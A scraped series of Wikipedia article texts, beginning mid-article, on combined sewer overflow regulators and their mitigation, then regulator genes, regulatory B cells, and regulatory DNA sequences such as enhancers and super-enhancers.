20th century changed the nature and volume of urban runoff to be initially cleaner, include water that formerly soaked away and previously saved rooftop rainwater after combined sewers were already widely adopted.
When constructed, combined sewer systems were typically sized to carry three [ 2 ] : pp. 2–4 to 160 times the average dry weather sewage flows. [ 5 ] : 136 It is generally infeasible to treat the volume of mixed sewage and surface runoff flowing in a combined sewer during peak runoff events caused by snowmelt or convective precipitation . As cities built sewage treatment plants, those plants were typically built to treat only the volume of sewage flowing during dry weather. Relief structures were installed in the collection system to bypass untreated sewage mixed with surface runoff during wet weather, protecting sewage treatment plants from damage caused if peak flows reached the headworks . [ 6 ]
These relief structures, called "storm-water regulators" (in American English - or "combined sewer overflows" in British English ) are constructed in combined sewer systems to divert flows in excess of the peak design flow of the sewage treatment plant. [ 6 ] Combined sewers are built with control sections establishing stage-discharge or pressure differential-discharge relationships which may be either predicted or calibrated to divert flows in excess of sewage treatment plant capacity. A leaping weir may be used as a regulating device allowing typical dry-weather sewage flow rates to fall into an interceptor sewer to the sewage treatment plant, but causing a major portion of higher flow rates to leap over the interceptor into the diversion outfall. Alternatively, an orifice may be sized to accept the sewage treatment plant design capacity and cause excess flow to accumulate above the orifice until it overtops a side-overflow weir to the diversion outfall. [ 5 ] : 112–114
CSO statistics may be confusing because the term may describe either the number of events or the number of relief structure locations at which such events may occur. A CSO event, as the term is used in American English, occurs when mixed sewage and stormwater are bypassed from a combined sewer system control section into a river, stream, lake, or ocean through a designed diversion outfall , but without treatment. Overflow frequency and duration varies both from system to system, and from outfall to outfall, within a single combined sewer system. Some CSO outfalls discharge infrequently, while others activate every time it rains. [ 2 ] : pp. 2–3, 2–4
The storm water component contributes pollutants to CSO; but a major faction of pollution is the first foul flush of accumulated biofilm and sanitary solids scoured from the dry weather wetted perimeter of combined sewers during peak flow turbulence . [ 8 ] Each storm is different in the quantity and type of pollutants it contributes. For example, storms that occur in late summer, when it has not rained for a while, have the most pollutants. Pollutants like oil, grease, fecal coliform from pet and wildlife waste, and pesticides get flushed into the sewer system. In cold weather areas, pollutants from cars, people and animals also accumulate on hard surfaces and grass during the winter and then are flushed into the sewer systems during heavy spring rains.
CSO discharges during heavy storms can cause serious water pollution problems. The discharges contain human and industrial waste, and can cause beach closings, restrictions on shellfish consumption and contamination of drinking water sources. [ 2 ]
CSOs differ from sanitary sewer overflows in that the latter are caused by sewer system obstructions, damage, or flows in excess of sewer capacity (rather than treatment plant capacity.) [ 2 ] : Ch.4 Sanitary sewer overflows may occur at any low spot in the sewer system rather than at the CSO relief structures. Absence of a diversion outfall often causes sanitary sewer overflows to flood residential structures and/or flow over traveled road surfaces before reaching natural drainage channels. Sanitary sewer overflows may cause greater health risks and environmental damage than CSOs if they occur during dry weather when there is no precipitation runoff to dilute and flush away sewage pollutants.
About 860 communities in the US have combined sewer systems, serving about 40 million people. [ 9 ] Pollutants from CSO discharges can include bacteria and other pathogens , toxic chemicals, and debris. These pollutants have also been linked with antimicrobial resistance , posing serious public health concerns. [ 10 ] The U.S. Environmental Protection Agency (EPA) issued a policy in 1994 requiring municipalities to make improvements to reduce or eliminate CSO-related pollution problems. [ 11 ] The policy is implemented through the National Pollutant Discharge Elimination System (NPDES) permit program. The policy defined water quality parameters for the safety of an ecosystem; it allowed for action that are site specific to control CSOs in most practical way for community; it made sure the CSO control is not beyond a community's budget; and allowed water quality parameters to be flexible, based upon the site specific conditions. The CSO Control Policy required all publicly owned treatment works to have "nine minimum controls" in place by January 1, 1997, in order to decrease the effects of sewage overflow by making small improvements in existing processes. [ 12 ] In 2000 Congress amended the Clean Water Act to require the municipalities to comply with the EPA policy. [ 13 ]
Mitigation of combined sewer overflows include sewer separation, CSO storage, expanding sewage treatment capacity, retention basins , screening and disinfection facilities, reducing stormwater flows, green infrastructure and real-time decision support systems . For example, cities with combined sewer overflows employ one or more engineering approaches to reduce discharges of untreated sewage, including:
The United Kingdom Environment Agency identified unsatisfactory intermittent discharges and issued an Urban Wastewater Treatment Directive requiring action to limit pollution from combined sewer overflows. [ 15 ] In 2009, the Canadian Council of Ministers of the Environment adopted a Canada-wide Strategy for the Management of Municipal Wastewater Effluent including national standards to (1) remove floating material from combined sewer overflows, (2) prevent combined sewer overflows during dry weather, and (3) prevent development or redevelopment from increasing the frequency of combined sewer overflows. [ 16 ]
Rehabilitation of combined sewer systems to mitigate CSOs require extensive monitoring networks which are becoming more prevalent with decreasing sensor and communication costs. [ 17 ] These monitoring networks can identify bottlenecks causing the main CSO problem, or aid in the calibration of hydrodynamic or hydrological models to enable cost effective CSO mitigation.
Municipalities in the US have been undertaking projects to mitigate CSO since the 1990s. For example, prior to 1990, the quantity of untreated combined sewage discharged annually to lakes, rivers, and streams in southeast Michigan was estimated at more than 30 billion US gallons (110,000,000 m 3 ) per year. In 2005, with nearly $1 billion of a planned $2.4 billion CSO investment put into operation, untreated discharges have been reduced by more than 20 billion US gallons (76,000,000 m 3 ) per year. This investment that has yielded an 85 percent reduction in CSO has included numerous sewer separation, CSO storage and treatment facilities, and wastewater treatment plant improvements constructed by local and regional governments. [ 18 ]
Many other areas in the US are undertaking similar projects (see, for example, in the Puget Sound of Washington). [ 19 ] Cities like Pittsburgh , Seattle , Philadelphia , and New York are focusing on these projects partly because they are under federal consent decrees to solve their CSO issues. Both up-front penalties and stipulated penalties are utilized by EPA and state agencies to enforce CSO-mitigating initiatives and the efficiency of their schedules. Municipalities' sewage departments, engineering and design firms, and environmental organizations offer different approaches to potential solutions.
Some US cities have undertaken sewer separation projects—building a second piping system for all or part of the community. In many of these projects, cities have been able to separate only portions of their combined systems. High costs or physical limitations may preclude building a completely separate system. [ 20 ] In 2011, Washington, D.C. , separated its sewers in four small neighborhoods at a cost of $11 million. (The project cost also included improvements to the drinking water piping system.) [ 21 ] [ 22 ]
Another solution is to build a CSO storage facility, such as a tunnel that can store flow from many sewer connections. Because a tunnel can share capacity among several outfalls, it can reduce the total volume of storage that must be provided for a specific number of outfalls. Storage tunnels store combined sewage but do not treat it. When the storm is over, the flows are pumped out of the tunnel and sent to a wastewater treatment plant. [ 18 ] One of the main concerns with CSO storage is the length of time it is stored before it is released. Without careful management of this storage period, the water in the CSO storage facility runs the risk of going septic. [ clarification needed ] [ citation needed ]
Washington, D.C. , is building underground storage capacity as its primary strategy to address CSOs. In 2011, the city began construction on a system of four deep storage tunnels, adjacent to the Anacostia River , that will reduce overflows to the river by 98 percent, and 96 percent system-wide. The system will comprise over 18 miles (29 km) of tunnels with a storage capacity of 157 million US gallons (590,000 m 3 ). [ 23 ] The first segment of the tunnel system, 7 miles (11 km) in length, went online in 2018. The remaining segments of the storage system are scheduled for completion in 2023. [ 24 ] (The city's overall "Clean Rivers" project, projected to cost $2.6 billion, includes other components, such as reducing stormwater flows .) [ 25 ] The South Boston CSO Storage Tunnel is a similar project, completed in 2011.
Indianapolis , Indiana, is building underground storage capacity in the form of a 28-mile (45 km) 18-foot (5.5 m) diameter deep rock tunnel system which will connect the two existing wastewater treatment plants, and provide collection of discharge water from the various CSO sites located along the White River , Eagle Creek, Fall Creek , Pogue's Run , and Pleasant Run. [ 26 ] Citizens Energy Group is managing the efforts to construct the first phases of the work, which includes a 250-foot (76 m) deep Deep Rock Tunnel Connector between the Belmont Wastewater Treatment Plant and the Southport Wastewater Treatment Plant. Additional tunnels will branch under the existing watercourses located in Indianapolis. The planned cost for the project will total $1.9 billion. [ 27 ]
Fort Wayne , Indiana, is constructing a 4.5-mile (7.2 km), 14-foot (4.3 m) diameter, $180M tunnel under the 3RPORT [ 28 ] (Three Rivers Protection and Overflow Reduction Tunnel) to address the myriad CSOs which outfall into the St. Mary's , St. Joseph , and Maumee Rivers . The 3RPORT is approximately 160 feet (49 m) below grade, and is anticipated to enter service in 2023.
In March 2024 [ 29 ] the Thames Tideway Tunnel was completed in London at a cost of around £5bn, with it reaching full operation in early 2025. The tunnel promises to reduce CSO spills by up to 95%. [ 30 ]
Some cities have expanded their basic sewage treatment capacity to handle some or all of the CSO volume. In 2002 litigation forced the city of Toledo, Ohio , to double its treatment capacity and build a storage basin in order to eliminate most overflows. The city also agreed to study ways to reduce stormwater flows into the sewer system. ( See Reducing stormwater flows .) [ 31 ]
Retention treatment basins or large concrete tanks that store and treat combined sewage are another solution. These underground structures can range in storage and treatment capacity from 2 million US gallons (7,600 m 3 ) to 120 million US gallons (450,000 m 3 ) of combined sewage. While each facility is unique, a typical facility operation is as follows. Flows from the overloaded sewers are pumped into a basin that is divided into compartments. The first flush compartment captures and stores flows with the highest level of pollutants from the first part of a storm. These pollutants include motor oil , sediment, road salt , and lawn chemicals (pesticides and fertilizers ) that are picked up by the stormwater as it runs off roads and lawns. The flows from this compartment are stored and sent to the wastewater treatment plant when there is capacity in the interceptor sewer after the storm. The second compartment is a treatment or flow-through compartment. The flows are disinfected by injecting sodium hypochlorite , or bleach, as they enter this compartment. It then takes about 20‑30 minutes for the flows to move to the end of the compartment. During this time, bacteria are killed and large solid materials settle out. At the end of the compartment, any remaining sanitary trash is skimmed off the top and the treated flows are discharged into the river or lake. [ 18 ]
The City of Detroit , Michigan, utilizes a system of nine CSO retention basins and screening/disinfection facilities that are owned and operated by the Great Lakes Water Authority . These basins are located at original combined sewer outfalls located along the Detroit River and Rouge River within metropolitan Detroit. These facilities are generally designed to contain two inches of stormwater runoff , with the ability to disinfect overflows during extreme wet-weather rainfall events.
Screening and disinfection facilities treat CSO without ever storing it. Called "flow-through" facilities, they use fine screens to remove solids and sanitary trash from the combined sewage. Flows are injected with sodium hypochlorite for disinfection and mixed as they travel through a series of fine screens to remove debris. The fine screens have openings that range in size from 4 to 6 mm, or a little less than a quarter inch. The flow is sent through the facility at a rate that provides enough time for the sodium hypochlorite to kill bacteria. All of the materials removed by the screens are then sent to the sewage treatment plant through the interceptor sewer. [ 32 ]
Communities may implement low impact development techniques to reduce flows of stormwater into the collection system. This includes:
CSO mitigating initiatives that are solely composed of sewer system reconstruction are referred to as gray infrastructure, while techniques like permeable pavement and rainwater harvesting are referred to as green infrastructure . Conflict often occurs between a municipality's sewage authority and its environmentally active organizations between gray and green infrastructural plans. [ citation needed ]
The 2004 EPA Report to Congress on CSO's provides a review of available technologies to mitigate CSO impacts. [ 2 ] : Ch. 8
Recent technological advances in sensing and control have enabled the implementation of real-time decision support systems (RT-DSS) for CSO mitigation. Through the use of internet of things technology and cloud computing , CSO events can now be mitigated by dynamically adjusting setpoints for movable gates, pump stations, and other actuated assets in sewers and storm water management systems. Similar technology, called adaptive traffic control is used to control the flow of vehicles through traffic lights. RT-DSS systems take advantage of storm temporal and spatial variability as well as varying concentration times due to diverse land uses across the sewershed to coordinate and optimize control assets. By maximizing storage and conveyance RT-DSS are able to minimize overflows using existing infrastructure. Successful implementations of RT-DSS have been carried out throughout the United States [ 33 ] [ 34 ] [ 35 ] and Europe. [ 36 ]
Real-time control (RTC) can be either heuristic or model based. Model-based control is theoretically more optimal, [ 37 ] but due to the ease of implementation, heuristic control is more commonly applied. Generating sufficient evidence that RTC is a suitable option for CSO mitigation remains problematic, although new performance methods might make this possible. [ 38 ]
There is in the UK a legal difference between a storm sewer and a surface water sewer. There is no right of connection to a storm-water overflow sewer under section 106 of the Water Industry Act. [ 39 ]
These are normally the pipe line that discharges to a watercourse, downstream of a combined sewer overflow. It takes the excess flow from a combined sewer. A surface water sewer conveys rainwater; legally there is a right of connection for rainwater to this public sewer. A public storm water sewer can discharge to a public surface water, but not the other way around, without a legal change in sewer status by the water company.
Combined sewer systems were common when urban sewerage systems were first developed, in the late 19th and early 20th centuries. [ 3 ]
The image of the sewer recurs in European culture as they were often used as hiding places or routes of escape by the scorned or the hunted, including partisans and resistance fighters in World War II . Fighting erupted in the sewers during the Battle of Stalingrad . The only survivors from the Warsaw Uprising and Warsaw Ghetto made their final escape through city sewers. Some have commented that the engravings of imaginary prisons by Piranesi were inspired by the Cloaca Maxima , one of the world's earliest sewers.
The theme of traveling through, hiding, or even residing in combined sewers is a common plot device in media. Famous examples of sewer dwelling are the Teenage Mutant Ninja Turtles , Stephen King's It , Les Misérables , The Third Man , Ladyhawke , Mimic , The Phantom of the Opera , Beauty and the Beast , and Jet Set Radio Future . The Todd Strasser novel Y2K-9: the Dog Who Saved the World is centered on a dog thwarting terroristic threats to electronically sabotage American sewage treatment plants.
A well-known urban legend , the sewer alligator , is that of giant alligators or crocodiles residing in combined sewers, especially of major metropolitan areas. Two public sculptures in New York depict an alligator dragging a hapless victim into a manhole . [ 41 ]
Alligators have been known to get into combined storm sewers in the southeastern United States. Closed-circuit television by a sewer repair company captured an alligator in a combined storm sewer on tape. [ 42 ] | https://en.wikipedia.org/wiki/Regulator_(sewer) |
In genetics , a regulator gene , regulator , or regulatory gene is a gene involved in controlling the expression of one or more other genes. Regulatory sequences , which encode regulatory genes, are often at the five prime end (5') to the start site of transcription of the gene they regulate. In addition, these sequences can also be found at the three prime end (3') to the transcription start site. In both cases, whether the regulatory sequence occurs before (5') or after (3') the gene it regulates, the sequence is often many kilobases away from the transcription start site . A regulator gene may encode a protein , or it may work at the level of RNA , as in the case of genes encoding microRNAs . An example of a regulator gene is a gene that codes for a repressor protein that inhibits the activity of an operator (a gene which binds repressor proteins thus inhibiting the translation of RNA to protein via RNA polymerase ). [ 1 ]
In prokaryotes , regulator genes often code for repressor proteins . Repressor proteins bind to operators or promoters , preventing RNA polymerase from transcribing RNA. They are usually constantly expressed so the cell always has a supply of repressor molecules on hand. [ 2 ] Inducers cause repressor proteins to change shape or otherwise become unable to bind DNA, allowing RNA polymerase to continue transcription.
Regulator genes can be located within an operon , adjacent to it, or far away from it. [ 3 ]
Other regulatory genes code for activator proteins . An activator binds to a site on the DNA molecule and causes an increase in transcription of a nearby gene. In prokaryotes, a well-known activator protein is the catabolite activator protein (CAP), involved in positive control of the lac operon .
In the regulation of gene expression , studied in evolutionary developmental biology (evo-devo), both activators and repressors play important roles. [ 4 ]
Regulatory genes can also be described as positive or negative regulators, based on the environmental conditions that surround the cell. Positive regulators are regulatory elements that permit RNA polymerase binding to the promoter region, thus allowing transcription to occur. In terms of the lac operon, the positive regulator would be the CRP-cAMP complex that must be bound close to the site of the start of transcription of the lac genes. The binding of this positive regulator allows RNA polymerase to bind successfully to the promoter of the lac gene sequence which advances the transcription of lac genes ; lac Z, lac Y, and lac A. Negative regulators are regulatory elements which obstruct the binding of RNA polymerase to the promoter region, thus repressing transcription. In terms of the lac operon, the negative regulator would be the lac repressor which binds to the promoter in the same site that RNA polymerase normally binds. The binding of the lac repressor to RNA polymerase's binding site inhibits the transcription of the lac genes. Only when an inducer is bound to the lac repressor will the binding site be free for RNA polymerase to carry out transcription of the lac genes. [ 5 ] [ 6 ] [ 7 ]
Promoters reside at the beginning of the gene and serve as the site where the transcription machinery assembles and transcription of the gene begins. Enhancers turn on the promoters at specific locations, times, and levels and can be simply defined as the “promoters of the promoter.” Silencers are thought to turn off gene expression at specific time points and locations. Insulators, also called boundary elements, are DNA sequences that create cis-regulatory boundaries that prevent the regulatory elements of one gene from affecting neighboring genes. The general dogma is that these regulatory elements get activated by the binding of transcription factors , proteins that bind to specific DNA sequences, and control mRNA transcription. There could be several transcription factors that need to bind to one regulatory element in order to activate it. In addition, several other proteins, called transcription cofactors, bind to the transcription factors themselves to control transcription. [ 8 ] [ 9 ]
Negative regulators act to prevent transcription or translation. Examples such as cFLIP suppress cell death mechanisms leading to pathological disorders like cancer , and thus play a crucial role in drug resistance . Circumvention of such actors is a challenge in cancer therapy . [ 10 ] Negative regulators of cell death in cancer include cFLIP , Bcl 2 family , Survivin , HSP , IAP , NF-κB , Akt , mTOR , and FADD . [ 10 ]
There are several different techniques to detect regulatory genes, but of the many there are a certain few that are used more frequently than others. One of these select few is called ChIP-chip. ChIP-chip is an in vivo technique used to determine genomic binding sites for transcription factors in two component system response regulators. In vitro microarray based assay (DAP-chip) can be used to determine gene targets and functions of two component signal transduction systems. This assay takes advantage of the fact that response regulators can be phosphorylated and thus activated in vitro using small molecule donors like acetyl phosphate . [ 11 ] [ 12 ]
Phylogenetic footprinting is a technique that utilizes multiple sequence alignments to determine locations of conserved sequences such as regulatory elements. Along with multiple sequence alignments, phylogenetic footprinting also requires statistical rates of conserved and non-conserved sequences. Using the information provided by multiple sequence alignments and statistical rates, one can identify the best conserved motifs in the orthologous regions of interest. [ 13 ] [ 14 ] | https://en.wikipedia.org/wiki/Regulator_gene |
Regulatory B cells (Bregs or B reg cells) represent a small population of B cells that participates in immunomodulation and in the suppression of immune responses. The population of Bregs can be further separated into different human or murine subsets such as B10 cells , marginal zone B cells , Br1 cells, GrB + B cells, CD9 + B cells, and even some plasmablasts or plasma cells . Bregs regulate the immune system by different mechanisms. One of the main mechanisms is the production of anti-inflammatory cytokines such as interleukin 10 (IL-10), IL-35 , or transforming growth factor beta (TGF-β). Another known mechanism is the production of cytotoxic Granzyme B . Bregs also express various inhibitory surface markers such as programmed death-ligand 1 (PD-L1), CD39 , CD73 , and aryl hydrocarbon receptor . The regulatory effects of Bregs were described in various models of inflammation , autoimmune diseases , transplantation reactions, and in anti-tumor immunity. [ 1 ] [ 2 ] [ 3 ]
In the 1970s it was noticed that Bregs could suppress immune reaction independently of antibody production. [ 4 ] In 1996 Janeway's group observed an immunomodulation of experimental autoimmune encephalomyelitis (EAE) by B cells. [ 5 ] Similar results were shown in a model of chronic colitis one year later. [ 6 ] Then a role of Bregs was found in many mouse models of autoimmune diseases as rheumatoid arthritis [ 7 ] or systemic lupus erythematosus (SLE). [ 8 ]
Bregs can develop from different subsets of B cells such as immature and mature B cells or plasmablasts . Whether Breg cells uniquely derive from a specific progenitor or originate within conventional B cell subsets is still an open question. [ 1 ] [ 9 ] Unfortunately, Breg cells are more difficult to define than regulatory T cells (Tregs) since they lack a lineage marker analogous to the Treg cell marker - FOXP3 . [ 10 ] Bregs share many markers with various B cell subsets due to their origin. Human and murine Bregs can be further separated into many subsets due to their different mechanism of action and distinct expression of key surface markers (table below). It is estimated that IL-10 producing B cell subpopulations can constitute up to 10% of circulating human B cells. [ 11 ] There is still no clear consensus on the classification and definition of Breg cells. [ 1 ] Mouse Bregs were mainly CD5 and CD1d positive in the model of EAE or after the exposition of Leishmania major . [ 12 ] [ 13 ] By contrast, mouse Bregs in model of collagen-induced arthritis (CIA) were mainly CD21 and CD23 positive. [ 14 ] Bregs were found in humans, too. Markers of peripheral blood Bregs were molecules CD24 and CD38 . [ 15 ] However, peripheral blood Bregs were mostly CD24 and CD27 positive after cultivation with anti-CD40 antibody and CpG bacterial DNA . [ 16 ] They were also positive for CD25 , CD71 and PD-L1 after stimulation by CpG bacterial DNA and through TLR9 . [ 17 ]
There are several mechanisms of Breg action. Nevertheless, the most examined mechanism is the production of IL-10. IL-10 has strong anti-inflammatory effects. [ 20 ] [ 21 ] It inhibits (or suppresses) inflammatory reactions mediated by T cells , especially Th1 and Th17 type immune reactions. This was shown for example in the models of EAE, [ 22 ] CIA [ 23 ] or contact hypersensitivity. [ 24 ] Likewise, regulatory B cell subsets have also been demonstrated to inhibit Th1 responses through IL-10 production during chronic infectious diseases such as visceral leishmaniasis . [ 25 ] By production of IL-10, Bregs are also capable of conversion of naïve CD4 + T cells into Tregs and IL-10-secreting type 1 regulatory CD4 + T cells . This has been observed in various experimental models as well as chronically virus-infected patients. [ 3 ] Another mechanism of Breg suppression is the production of transforming growth factor (TGF-β), an anti-inflammatory cytokine. [ 20 ] The role of Bregs producing TGF-β was found in the mouse models of SLE [ 8 ] and diabetes . [ 26 ] The last anti-inflammatory cytokine produced only by some Bregs is IL-35 , which plays a role in Treg conversion. Breg cells are capable of releasing IL-35 containing exosomes . It is not yet clear whether IL-10 and IL-35-producing Bregs correspond to separate populations or display some degree of overlap. [ 3 ] Besides the production of immunomodulatory cytokines, Bregs also release cytotoxic granzyme B involved in the degradation of the T cell receptor and T cell apoptosis. [ 11 ] Another mechanism of Breg suppression involves surface molecules such as FasL , which induces T cell death, [ 27 ] or PD-1 and PD-L1 . PD-1 + Bregs have been shown to suppress CD4 + and CD8 + T cell activity and induce Tr1 cells, while PD-L1 Bregs were reported to inhibit NK and CD8 + T cell cytotoxicity. [ 3 ] Some Bregs also express additional suppressive molecules such as CD39, CD73, and aryl hydrocarbon receptor. [ 1 ]
Resting B lymphocytes do not produce cytokines. After the response to antigen or different stimuli such as lipopolysaccharide (LPS) pro- and anti-inflammatory cytokines TNFα , IL-1β , IL-10 and IL-6 are produced. This indicates that the Breg must be stimulated to produce suppressive cytokines. There are two types of signals to activate Breg, namely signals generated by external pathogens (PAMPs) and endogenous signals produced by the action of body cells. PAMPs are recognized by the toll-like receptors (TRLs). TLRs trigger a signal cascade at the end of which is the production of effector cytokines. Bregs are mainly generated after the recognition of TLR4 or TLR9 ligands - LPS and CpG . The main endogenous signal is the stimulation of the surface molecule CD40 . [ 1 ] [ 2 ] Some anti-inflammatory factors, such as IL-35 and retinoic acid have also been proposed to induce Breg phenotype. Additionally, cytokine IL-21 together with CD40 ligand and/or TLR9 signals has been shown to induce B10 generation and the emergence of IL-10 producing plasmablasts during inflammatory processes. [ 3 ]
Bregs are studied in several human autoimmune diseases such as multiple sclerosis (MS), rheumatoid arthritis , SLE , type 1 diabetes , or Sjögren's syndrome . Generally, Breg cells seem to be important in preventing autoimmune diseases and are often reported reduced or with impaired inhibitory abilities in autoimmunity. [ 1 ] [ 28 ]
The main reported mechanism of Breg reduction of MS is the production of IL-10, IL-35, and TGF- β. Bregs have been extensively studied in the mouse model of multiple sclerosis - EAE, where the depletion of Bregs worsened the disease and increased the number of autoreactive T cells , but it is not clear whether the frequencies of Breg cells are altered in MS patients. Although one study reported normal Breg frequencies in MS patients, a few others have observed a decreased amount of Breg cells in patients. It has been reported that an approved medication for MS treatment Glatiramer acetate increases Breg frequencies and enhances their function. Similarly, Alemtuzumab , which is an antibody that binds CD52 of T and B cells and causes apoptosis or cell lysis, increases the frequency of Bregs in patients with relapsing MS. [ 1 ]
It has been observed that patients with SLE have deficiencies in the function of Bregs. Bregs isolated from patients had been reported to lose their regulatory capacity and be unable to inhibit the expression of pro-inflammatory cytokines IFN-γ and TNF-α by CD4 + T cells compared to Bregs from healthy donors. Several studies have also noted a decrease in the percentage of IL-35 + and IL-10 + Bregs cells in SLE patients. [ 1 ] [ 29 ]
In mouse models, IL-10-producing Bregs have been shown to control autoimmune diabetes. In type 1 diabetes (T1D), the evidence suggests that IL-10–producing Bregs are numerically and functionally defective in patients compared to healthy donors. Bregs in T1D have decreased production of IL-10 and are unable to suppress Th1 and Th17 immune responses. Moreover, these defective Bregs are unable to convert naive CD4 + T cells in Tregs. [ 19 ] [ 28 ]
Tumor-infiltrating B lymphocytes consist of various phenotypes, including both effector and regulatory B cells. IL-10 or Granzyme B-producing Bregs have been detected in various human cancers. Additionally, most studies have reported a positive correlation between Breg cells and Treg cells, which indicated an interaction between these subsets. [ 10 ] It has been observed that higher frequencies of IL-10-producing B cells were observed in late-stage disease samples than in early-stage samples of esophageal cancer . [ 30 ] Leukemia B cells spontaneously produce large amounts of IL-10. [ 31 ] Moreover, increased levels of Bregs were detected in the peripheral blood and bone marrow of patients with acute myeloid leukemia . IL-10-producing Bregs are also present in gastric cancer , breast cancer , head and neck squamous carcinoma , and esophageal squamous carcinoma. The evidence suggests an immunosuppressive Breg role in cancer and it is possible that cancerous proliferation uses Bregs for its escape from the immune response. [ 30 ]
It has been reported that patients undergoing kidney transplantation who were subjected to B-cell depletion therapy showed a higher incidence of graft rejection. The evidence shows that immunosuppressive properties of Bregs might play an essential role in allotransplants. Murine models of allotransplantation showed that Bregs increased the duration of allograft survival and controlled Th17, Tfh , and follicular regulatory T-cell differentiation. [ 1 ] In other types of transplants, B cells can participate both in tolerance and in transplant rejection, depending on the origin of the Breg subpopulation. [ 32 ] | https://en.wikipedia.org/wiki/Regulatory_B_cell |
A regulatory sequence is a segment of a nucleic acid molecule which is capable of increasing or decreasing the expression of specific genes within an organism. Regulation of gene expression is an essential feature of all living organisms and viruses.
In DNA , regulation of gene expression normally happens at the level of RNA biosynthesis ( transcription ). It is accomplished through the sequence-specific binding of proteins ( transcription factors ) that activate or inhibit transcription. Transcription factors may act as activators , repressors , or both. Repressors often act by preventing RNA polymerase from forming a productive complex with the transcriptional initiation region ( promoter ), while activators facilitate formation of a productive complex. Furthermore, DNA motifs have been shown to be predictive of epigenomic modifications, suggesting that transcription factors play a role in regulating the epigenome . [ 2 ]
In RNA , regulation may occur at the level of protein biosynthesis ( translation ), RNA cleavage, RNA splicing , or transcriptional termination. Regulatory sequences are frequently associated with messenger RNA (mRNA) molecules, where they are used to control mRNA biogenesis or translation. A variety of biological molecules may bind to the RNA to accomplish this regulation, including proteins (e.g., translational repressors and splicing factors), other RNA molecules (e.g., miRNA ) and small molecules , in the case of riboswitches .
A regulatory DNA sequence does not regulate unless it is activated. Different regulatory sequences are activated and then implement their regulation by different mechanisms.
Expression of genes in mammals can be upregulated when signals are transmitted to the promoters associated with the genes. Cis -regulatory DNA sequences that are located in DNA regions distant from the promoters of genes can have very large effects on gene expression, with some genes undergoing up to 100-fold increased expression due to such a cis -regulatory sequence. [ 3 ] These cis -regulatory sequences include enhancers , silencers , insulators and tethering elements. [ 4 ] Among this constellation of sequences, enhancers and their associated transcription factor proteins have a leading role in the regulation of gene expression. [ 5 ]
Enhancers are sequences of the genome that are major gene-regulatory elements. Enhancers control cell-type-specific gene expression programs, most often by looping through long distances to come in physical proximity with the promoters of their target genes. [ 6 ] In a study of brain cortical neurons, 24,937 loops were found, bringing enhancers to promoters. [ 3 ] Multiple enhancers, each often at tens or hundreds of thousands of nucleotides distant from their target genes, loop to their target gene promoters and coordinate with each other to control expression of their common target gene. [ 6 ]
The schematic illustration in this section shows an enhancer looping around to come into close physical proximity with the promoter of a target gene. The loop is stabilized by a dimer of a connector protein (e.g. dimer of CTCF or YY1 ), with one member of the dimer anchored to its binding motif on the enhancer and the other member anchored to its binding motif on the promoter (represented by the red zigzags in the illustration). [ 7 ] Several cell function specific transcription factor proteins (in 2018 Lambert et al. indicated there were about 1,600 transcription factors in a human cell [ 8 ] ) generally bind to specific motifs on an enhancer [ 9 ] and a small combination of these enhancer-bound transcription factors, when brought close to a promoter by a DNA loop, govern the level of transcription of the target gene. Mediator (coactivator) (a complex usually consisting of about 26 proteins in an interacting structure) communicates regulatory signals from enhancer DNA-bound transcription factors directly to the RNA polymerase II (RNAP II) enzyme bound to the promoter. [ 10 ]
Enhancers, when active, are generally transcribed from both strands of DNA with RNA polymerases acting in two different directions, producing two eRNAs as illustrated in the Figure. [ 11 ] An inactive enhancer may be bound by an inactive transcription factor. Phosphorylation of the transcription factor may activate it and that activated transcription factor may then activate the enhancer to which it is bound (see small red star representing phosphorylation of a transcription factor bound to an enhancer in the illustration). [ 12 ] An activated enhancer begins transcription of its RNA before activating a promoter to initiate transcription of messenger RNA from its target gene. [ 13 ]
Transcription factor binding sites within enhancers (see figure above) are usually about 10 base pairs long, though they can vary from just a few to about 20 base pairs. [ 14 ] Enhancers usually have about 10 transcription factor binding sites within an average enhancer site of about 204 base pairs. [ 15 ] Examining enhancer-gene regulatory interactions occurring in 352 cell types and tissues, more than 13 million active enhancers were found. [ 16 ]
While enhancers are needed for transcription of genes in a cell above low levels, a cluster of enhancers, known as a super-enhancer, can cause transcription of a target gene at even higher levels. Super-enhancers usually drive genes needed for cell identity to express at high levels. [ 17 ] [ 18 ] In cancers, a super-enhancer may also drive a particular oncogene to express at a high level. [ 17 ] [ 18 ]
A super-enhancer is defined as a cluster of typical enhancers in close genomic proximity (within about 9,000 [ 17 ] to 22,0000 [ 19 ] base pairs in length) that, all together, regulate the expression of a target gene. [ 20 ] Super-enhancer-driven genes are expressed at significantly higher levels than the expression of genes under the control of typical enhancers. [ 20 ]
A diagram of a super-enhancer is shown in the Figure in this section. In this Figure, the super-enhancer is 12,000 nucleotides long and has four typical enhancers within its length. Each of the typical enhancers simultaneously contacts the promoter region of the same target gene. Each typical enhancer within the super-enhancer has multiple DNA motifs to which transcription factors bind. Each typical enhancer is also bound to a 26-component mediator complex which transmits the signals from the transcription factors bound to the enhancer to the promoter of their joint target gene. The protein BRD4 forms a complex with each typical enhancer in the super-enhancer and helps to stabilizes the super-enhancer structure. [ 21 ] In addition, the architectural protein YY1 (indicated by paired red zigzags) helps keep the loops together that bring the typical enhancers to their target gene in the super-enhancer. [ 7 ] Therefore, there are many proteins in close association at a super-enhancer. These proteins generally have a structured domain as well as a tail with an intrinsically disordered region (IDR). [ 22 ] Many of the IDRs of these proteins interact with each other, thereby forming a water-excluding gel or phase-separated condensate around the super-enhancer. [ 22 ]
Some super-enhancers induce very high levels of transcription such as the mouse α-globin super-enhancer [ 23 ] and the Wap super-enhancer. [ 24 ] The mouse α-globin super-enhancer has five typical enhancers within the super-enhancer. Only when acting together, they increase transcription of the α-globin gene by 450-fold. [ 23 ] In another example, the mouse Wap super-enhancer includes three typical enhancers. Only when the three typical enhancers act together do they increase transcription of the Wap gene by 1000-fold. [ 24 ]
The enhancers within the super-enhancers described above act synergistically. However, in a second type of super-enhancer, the component enhancers act additively. In a third group, super-enhancers appear to act “logistically” where promoter activity reaches a limit. One study examined 773 target genes that were paired with near-by groups of possible super-enhancers (with 2–20 enhancers in close proximity likely acting as super-enhancers). In this study it appeared that 277, 92, and 250 of the likely super-enhancers acted by the additive, synergistic, and logistic models. [ 25 ]
